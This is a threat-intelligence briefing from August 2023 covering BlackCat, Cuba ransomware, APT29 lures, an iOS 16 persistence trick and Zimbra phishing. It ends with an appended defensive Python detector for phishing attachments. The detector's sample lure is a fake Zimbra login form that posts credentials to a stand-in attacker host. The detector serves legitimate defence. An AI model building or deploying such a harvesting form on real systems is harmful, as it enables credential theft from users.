
Cyware Daily Threat Intelligence


Daily Threat Briefing Aug 18, 2023

The BlackCat ransomware has evolved its tactics, with a new version noticed by Microsoft experts recently. This version incorporates Impacket and a PsExec-like tool called RemCom for lateral movement and remote code execution on compromised networks. Another unidentified threat group used a mass-spreading technique against Zimbra Collaboration users to steal credentials. The campaign, active since April, has been targeting small and medium-sized businesses and government entities.

In a different development, researchers crafted an attack scenario for iOS 16 devices, creating a synthetic Airplane Mode to remain undetected. Apple clarified that this doesn't exploit a specific vulnerability but is a method for persistence after the initial compromise.

Top Breaches Reported in the Last 24 Hours

APT29 targets NATO-aligned MoFA

Researchers at EclecticIQ encountered an attack campaign by the Russia-linked APT29, targeting Ministries of Foreign Affairs of NATO-aligned countries. The group used PDF files masquerading as communications from the German embassy. The PDFs contained diplomatic invitation lures, with one delivering a variant of the Duke malware. The second PDF was presumably used for reconnaissance, to notify the attackers whether a victim opened the message.

Access major auction house network for $120,000

Initial Access Brokers (IABs) breached a major auction house's network and are offering access to the compromised network for $120,000, according to researchers at threat intelligence company Flare. The IAB advertisements on the forum, posted between May 1 and July 27, show that over 100 companies were targeted across 18 industries, with organizations in the U.S., Australia, and the U.K. being the most common targets. The finance and retail sectors accounted for the largest number of attacks.

Top Malware Reported in the Last 24 Hours

New BlackCat ransomware variant surfaces

Microsoft uncovered a new version of the BlackCat ransomware, which incorporates tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket, a toolset for network protocol research and penetration testing, and RemCom, an open-source alternative to PsExec, facilitate ransomware deployment and remote access within the compromised network.

Cuba operators exploit Veeam flaw

The Cuba ransomware group has been seen deploying a comprehensive toolset, including BUGHATCH (a custom downloader), BURNTCIGAR (an antimalware killer), Wedgecut (a host enumeration utility), and the Metasploit and Cobalt Strike frameworks. The criminals used two exploits, a Veeam Backup & Replication vulnerability (CVE-2023-27532) and the ZeroLogon bug (CVE-2020-1472), against the critical infrastructure sector in the U.S. and a Latin America-based IT integrator.

Top Vulnerabilities Reported in the Last 24 Hours

Post-exploit persistence technique on iOS 16

Researchers from Jamf Threat Labs found a new post-exploit persistence technique on iOS 16 that allows attackers to maintain access to an Apple device even when the victim believes it is in Airplane Mode. Through this technique, the attacker remains hidden while maintaining a cellular network connection for a malicious application. By blocking cellular data access for specific apps and altering the alert window to appear as if Airplane Mode is enabled, attackers can create an artificial Airplane Mode that hides their activities and maintains connectivity for their rogue application.

Top Scams Reported in the Last 24 Hours

Phishing campaign steals Zimbra credentials

ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. The file opens a fake Zimbra login page designed to collect credentials, which are then exfiltrated to a server controlled by the attackers.
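A defender-side check of the kind a mail gateway could run on such an attachment, added here as an example (not code from the briefing or from ESET): it flags an HTML file that contains a password field and posts, or scripts a request, to a host outside an assumed list of trusted webmail hosts; the host list and the sample lure are constructed placeholders.

```python
"""Added example: flag an HTML attachment that renders a login form and sends credentials off-site."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed placeholder: the organisation's legitimate webmail hosts.
TRUSTED_HOSTS = {"mail.example.org", "zimbra.example.org"}
# Absolute URLs inside inline <script> (fetch / XMLHttpRequest targets).
_URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)

class _LoginFormScanner(HTMLParser):
    # Collects form actions, inline script text and whether a password field exists.
    def __init__(self):
        super().__init__()
        self.actions, self.scripts = [], []
        self.has_password = self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _external(url):
    # A URL is external when it names a host that is not one of ours.
    host = urlparse(url).hostname
    return host is not None and host.lower() not in TRUSTED_HOSTS

def scan_html_attachment(html):
    """Return reasons the attachment looks like a credential-harvesting page (empty = clean)."""
    p = _LoginFormScanner(); p.feed(html)
    if not p.has_password:  # no password field: not a login lure
        return []
    reasons = [f"password form posts off-site to {a}" for a in p.actions if _external(a)]
    for url in _URL_RE.findall(" ".join(p.scripts)):
        if _external(url):
            reasons.append(f"inline script contacts external host {urlparse(url).hostname}")
    return reasons

# Constructed sample modelled on the lure described above (not a real file).
SAMPLE_LURE = """<html><body><h2>Zimbra Web Client</h2>
<form method="post" action="https://attacker.invalid/collect.php">
<input name="user"><input type="password" name="pass"><button>Sign in</button>
</form></body></html>"""
```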
